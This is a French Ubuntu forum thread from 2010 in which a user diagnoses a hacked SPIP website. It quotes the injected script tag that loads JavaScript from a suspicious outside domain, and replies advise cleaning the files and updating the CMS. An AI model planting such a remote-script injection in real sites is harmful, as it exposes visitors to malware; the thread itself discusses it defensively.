Pages : 1
#1 Le 25/06/2010, à 10:39
- genma
Pb avec un site web
Sur le site d'un ami hébergé chez Free, ça met très longtemps à se lancer et dans la barre d'état de firefox, j'ai pu lire "en attente de assolkh.blackhulu.com"
Si je regarde le code source de la page, je vois en dernière ligne, en plus du code classique HTML correspondant à son site :
<script type="text/javascript" src="http://assolkh.blackhulu.com:8080/Yahoo.js"></script>
Je cherche un peu sur google : "assolkh.blackhulu.com"
Et j'ai trouvé :
http://safeweb.norton.com/report/show?n … ckhulu.com
Rapport de menace
Nombre total de menaces trouvées : 1
Qu'en pensez-vous? Perso, je pense à un hack du site avec ajout du lien pour lancer automatique un script qui, si il trouve la faille, injecte un cheval de troie. Le site tourne sous SPIP, probablement une version 1.9, peut être 2.0. Auriez vous des conseils à me donner pour l'aider à investiguer?
"Lorsque tu as découvert le libre, tu sais que tu ne pourras plus jamais revenir en arrière".
Utilisateur d'Ubuntu depuis la version 4.10 !
Mon blog ? https://blog.genma.fr
Mon twitter? http://twitter.com/genma
Hors ligne
#2 Le 25/06/2010, à 12:23
- obibann
Re : Pb avec un site web
En effet, ça sens le hack.
Cependant, tu ne crains pas grand chose d'un fichier javascript A part t'afficher une page à la con le risque est faible (bon sauf si tu es sous Windows avec Internet Explorer )
Ubuntu 16.04
Avec Windows, on fait ce qu'on peut... Avec Linux, on fait ce qu'on veut !! :p
Hors ligne
#3 Le 25/06/2010, à 13:28
- abelthorne
Re : Pb avec un site web
Dis à ton pote de commencer par se connecter à son site en FTP pour voir s'il n'y aurait pas eu ajout de dossiers/scripts/etc. qui serviraient à faire du phishing ou quelque chose dans le genre.
Ensuite, qu'il retrouve dans les sources du site la ligne qui a été rajoutée et qu'il la vire, tout simplement. Si elle se trouve tout à la fin du code, qu'il commence par vérifier dans le footer, les gabarits du thème utilisé, etc. (Je ne connais pas SPIP en particulier, mais j'imagine qu'il fonctionne avec des thèmes/gabarits, comme la plupart des CMS et approchants.)
Au passage, ça peut être utile de passer à la dernière version de SPIP si ce n'est pas le cas, des fois que le script en question ait profité d'une faille qui est peut-être corrigée.
Hors ligne
Pages : 1